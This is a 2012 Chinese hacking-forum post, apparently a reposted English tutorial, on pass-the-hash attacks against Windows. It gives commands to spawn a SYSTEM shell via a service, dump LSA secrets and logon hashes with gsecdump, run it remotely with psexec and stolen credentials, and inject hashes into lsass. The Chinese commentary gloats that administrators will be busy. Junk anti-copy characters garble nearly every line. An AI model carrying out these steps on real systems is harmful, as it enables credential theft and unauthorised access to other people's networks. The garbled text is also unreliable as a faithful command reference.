中国网络渗透测试联盟

标题: HASH注入式攻击 [打印本页]
作者: admin    时间: 2012-11-6 21:09
标题: HASH注入式攻击
o get a DOS Prompt as NT system:0 n( ?# ^/ W5 W2 x) N: ~0 Y

: x1 M2 E6 z2 N7 W3 h0 ~: ^C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
& [  X/ f+ [5 D( V- q[SC] CreateService SUCCESS) i3 [8 E% q% }- K- s5 {6 y+ S
1 i1 V& C' L. D# N4 w
C:\>sc start shellcmdline( X5 |% {& |  U  o: k) w& N) f
[SC] StartService FAILED 1053:( G% I) f% D8 t* G2 G5 _% N- j' a5 I
# }  l8 N# d5 `' E
The service did not respond to the start or control request in a timely fashion." i8 `9 Y/ E/ u

5 g8 x/ Q- W# y( m' t) ^C:\>sc delete shellcmdline5 T' B5 w1 V' F' q
[SC] DeleteService SUCCESS
; Q6 }' z2 P1 N- ]  E0 y& {, {- j6 m+ ?
2 K. A6 x1 X  y0 E4 i6 c------------9 @' Z  M& E0 k; k1 _% `

8 |8 t/ |( A/ J# `: u. BThen in the new DOS window:
2 V) [! P; Z1 g3 c. V) D
  O& S3 R, D8 g2 |5 aMicrosoft Windows XP [Version 5.1.2600]
: W: c$ w; _( O8 E(C) Copyright 1985-2001 Microsoft Corp.
; c' Y3 K7 J: D* q% D0 \' c4 z- K3 L& r' E" \1 F/ D
C:\WINDOWS\system32>whoami
& z, z$ R. Z- NNT AUTHORITY\SYSTEM8 H  l4 Y, ^' H9 c! D5 F& M' v
& y4 q* `$ I3 ^" |( B' q
C:\WINDOWS\system32>gsecdump -h4 K! _4 Q1 \: ]5 r& I; X6 y
gsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)
0 X* u6 J3 _9 I: e$ K8 jusage: gsecdump [options]
: v# }& [. w, m$ s$ w
8 v( o  B6 o; Moptions:: T- d9 i" y- k: L
-h [ --help ] show help
" g% f# P( f9 i; ]" t0 e-a [ --dump_all ] dump all secrets
( o* {$ r4 K; |# {-l [ --dump_lsa ] dump lsa secrets6 ~& {6 x: [5 B( j  x6 N9 I+ Z6 R
-w [ --dump_wireless ] dump microsoft wireless connections  R2 b, @- g9 q
-u [ --dump_usedhashes ] dump hashes from active logon sessions3 d1 Z( f- a: \
-s [ --dump_hashes ] dump hashes from SAM/AD7 n5 S" |. [. r, q& l% T' s+ L
) b3 y0 u2 I6 H& r7 k
Although I like to use:: T/ B" H8 X6 D  c( c1 F3 @5 N2 P
. A0 n+ h$ C) p# B  {% y
PsExec v1.83 - Execute processes remotely3 t8 C) F) r( ~- H! m4 G2 V4 Q9 \' k
Copyright (C) 2001-2007 Mark Russinovich
: j5 m- ]# J5 i# g( ~Sysinternals - 链接标记[url]www.sysinternals.com[/url]
0 I3 |" }1 f, k& D. Y' i3 `: X; h
, G7 A$ W, P% h, u- h" e/ a+ lC:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT
4 x1 T. M. @: c- }
3 y+ C7 e4 z+ c; Xto get the hashes from active logon sessions of a remote system.4 T6 j- U6 m5 \: Z" Q
8 f' }. s: h! }' i- `
These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.
# t, Y, B/ d" G  F8 _8 J1 T
2 H( H1 `" e0 L+ L9 c) k" L6 j提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.
+ J% v. G% I4 _原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]9 p$ R; G8 `0 @) C6 s0 Q  t5 n
$ N: P+ F! Q! r6 I3 P6 N
我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。! T& S6 n2 x/ k




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2